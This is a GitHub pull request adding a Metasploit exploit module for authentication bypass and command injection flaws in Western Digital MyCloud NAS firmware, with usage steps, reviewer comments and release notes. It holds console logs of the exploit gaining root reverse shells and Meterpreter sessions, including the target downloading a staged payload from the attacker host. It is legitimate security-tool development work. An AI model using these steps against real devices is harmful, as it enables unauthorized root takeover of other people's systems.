Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add wd_mycloud_unauthenticated_cmd_injection module and docs (CVE-2016-10108 and CVE-2018-17153) #18221

Merged
merged 3 commits into from
Jul 28, 2023
Merged

Add wd_mycloud_unauthenticated_cmd_injection module and docs (CVE-2016-10108 and CVE-2018-17153) #18221

merged 3 commits into from
Jul 28, 2023

Conversation

ErikWynter
Copy link
Contributor

About

This change adds an exploit module for authentication bypass (CVE-2018-17153) and command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196.

Vulnerable Application

Western Digital MyCloud before 2.30.196. The module has been tested against 2.30.183.
Some notes:

  • Version 2.30.196 includes a patch for the authentication bypass (CVE-2018-17153). The command injection vector (CVE-2016-10108) should have been patched in 2.21.126, but I tested these issues against version 2.30.183 and discovered that CVE-2016-10108 was still exploitable there, but only after leveraging the authentication bypass. This implies that the patch for CVE-2016-10108 did not actually remove the command injection vector, but only prevented unauthenticated access to it.
  • I was not able to test versions older than 2.21.126, but based on the available disclosures, CVE-2016-10108 should be exploitable without CVE-2018-17153 on those versions. However, since older versions will also be vulnerable to CVE-2018-17153, this module always chains exploits for both issues.

For more info, see:

Target Information

I only have temporary access to the target and I haven't found a way to install a vulnerable target myself. Because of that, I will email a spool file to the msfdev team. This file has output from running the module with HTTPTRACE for both targets. I've taken this approach in the past, so I hope that is sufficient.

That being said, I did find this post with download links for WD MyCloud versions, but the links to the firmware no longer seem to work. The links to the source code do work.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection
  3. Do: set RHOSTS [IP]
  4. Do: set LHOST [IP]
  5. Do: exploit

Options

TARGETURI

The base path to WD MyCloud. The default value is /.

Targets

Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper

Scenarios

Western Digital MyCloud 2.30.183 - Unix In-Memory

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to WD MyCloud
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:6000 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] Attempting to execute echo tLD1sR3mLQXV1AYFuHV46x5...
[+] The target is vulnerable. The target executed the echo command.
[*] 10.10.10.45:443 - Executing the payload. This may take a few seconds...
[*] Command shell session 1 opened (10.10.10.18:6000 -> 10.10.10.45:45402) at 2023-07-26 13:51:06 +0000
id
uid=0(root) gid=0(root) groups=0(root)
head /usr/local/config/config.xml
<config>
	<sw_ver_1>2.30.183</sw_ver_1>
	<sw_ver_2>2.30.183.0116.2018</sw_ver_2>
	<hw_ver>WDMyCloudEX4100</hw_ver>
	<eula>1</eula>
	<language>0</language>
	<registered>0</registered>
	<eula_fw>0</eula_fw>
	<eula_apps>0</eula_apps>
	<analytics>0</analytics>

Western Digital MyCloud 2.30.183 - Linux Dropper

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > options 

Module options (exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to WD MyCloud
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.10.18      yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/armle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.18      yes       The listen address (an interface may be specified)
   LPORT  6001             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:6001 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] Attempting to execute echo gkmp1ak8jprpqinbvmN84QXaWfgirEt...
[+] The target is vulnerable. The target executed the echo command.
[*] Using URL: http://10.10.10.18:8080/xFQRlaZ5ODY9ZQa
[*] Client 10.10.10.45 (curl/7.42.1) requested /xFQRlaZ5ODY9ZQa
[*] Sending payload to 10.10.10.45 (curl/7.42.1)
[*] Sending stage (934728 bytes) to 10.10.10.45
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Meterpreter session 2 opened (10.10.10.18:6001 -> 10.10.10.45:43738) at 2023-07-26 13:51:59 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 10.10.10.45
OS           :  (Linux 3.10.39)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux

@ErikWynter
Copy link
Contributor Author

I will add docs later, but wanted to submit this ASAP since I only have access to my targeted for a limited time as mentioned (hopefully until Monday, but access may be cut off before)

@cdelafuente-r7 cdelafuente-r7 self-assigned this Jul 26, 2023
@github-actions
Copy link

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

cdelafuente-r7
cdelafuente-r7 reviewed Jul 27, 2023
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @ErikWynter for this module! It looks great! I just left a few comments. I also reviewed the HTTP trace you sent and it looks good. Please, can you also record a trace selecting the other target? I believe this one only shows the Linux Dropper target (Meterpreter session).

modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb Outdated Show resolved Hide resolved
@ErikWynter
Copy link
Contributor Author

ErikWynter commented Jul 27, 2023
edited
Loading

Thanks @ErikWynter for this module! It looks great! I just left a few comments. I also reviewed the HTTP trace you sent and it looks good. Please, can you also record a trace selecting the other target? I believe this one only shows the Linux Dropper target (Meterpreter session).

@cdelafuente-r7 Thanks for the review! I'll try to get to these tonight. I double checked the HTTPTrace I sent but it already includes both targets. Lines 1-1136 show the Unix target and then I switched to the Linux Dropper:
image

@cdelafuente-r7
Copy link
Contributor

Oh my bad! I got lost in the huge HTTP trace file and missed this. Thank you for the heads-up!

@ErikWynter
Copy link
Contributor Author

@cdelafuente-r7 no worries, it was a ridiculously large trace file so I totally understand. I just pushed fixes for all the issues mentioned. I also fixed one print statement to be consistent with the others. It's working great:

msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run
[*] Started reverse TCP handler on 10.10.10.18:7007
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] 10.10.10.45:443 - Attempting to execute echo hvUSLm4T4rFhTot2GP1u...
[+] The target is vulnerable. The target executed the echo command.
[*] 10.10.10.45:443 - Executing the payload. This may take a few seconds...
[*] Command shell session 6 opened (10.10.10.18:7007 -> 10.10.10.45:34561) at 2023-07-27 20:16:50 +0000

id
uid=0(root) gid=0(root) groups=0(root)
background
Background session 6? [y/N]  y
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > set target 1
target => 1
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > set lport 7008
lport => 7008
msf6 exploit(linux/http/wd_mycloud_unauthenticated_cmd_injection) > run

[*] Started reverse TCP handler on 10.10.10.18:7008
[*] Running automatic check ("set AutoCheck false" to disable)
[*] 10.10.10.45:443 - The target is WD MyCloud. Checking vulnerability status...
[*] 10.10.10.45:443 - Attempting to execute echo yIYT4UlygJytKXnuWIgfFiUPJDEqPy86DgAdDGz8...
[+] The target is vulnerable. The target executed the echo command.
[*] Using URL: http://10.10.10.18:8081/PdniJ8Y
[*] Client 10.10.10.45 (curl/7.42.1) requested /PdniJ8Y
[*] Sending payload to 10.10.10.45 (curl/7.42.1)
[*] Sending stage (934728 bytes) to 10.10.10.45
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Meterpreter session 7 opened (10.10.10.18:7008 -> 10.10.10.45:41989) at 2023-07-27 20:19:09 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 10.10.10.45
OS           :  (Linux 3.10.39)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >

@ErikWynter
Copy link
Contributor Author

btw I'll try and add the docs tomorrow

@cdelafuente-r7
Copy link
Contributor

Thanks for updating this! Everything looks good to me now. I land it once the documentation is ready.

@ErikWynter
Copy link
Contributor Author

@cdelafuente-r7 I just added the docs too. Please let me know if anything else is needed. :)

@cdelafuente-r7
Copy link
Contributor

Everything looks good! I'll go ahead and land it. Thank you for your contribution!

@cdelafuente-r7 cdelafuente-r7 added docs rn-modules release notes for new or majorly enhanced modules and removed needs-docs labels Jul 28, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 0c1d945 into rapid7:master Jul 28, 2023
36 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This adds an exploit module for an authentication bypass (CVE-2018-17153) and a command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196. The module first performs a check to validate if the target is vulnerable by attempting to leverage an authentication bypass followed by injecting a simple echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@ErikWynter @cdelafuente-r7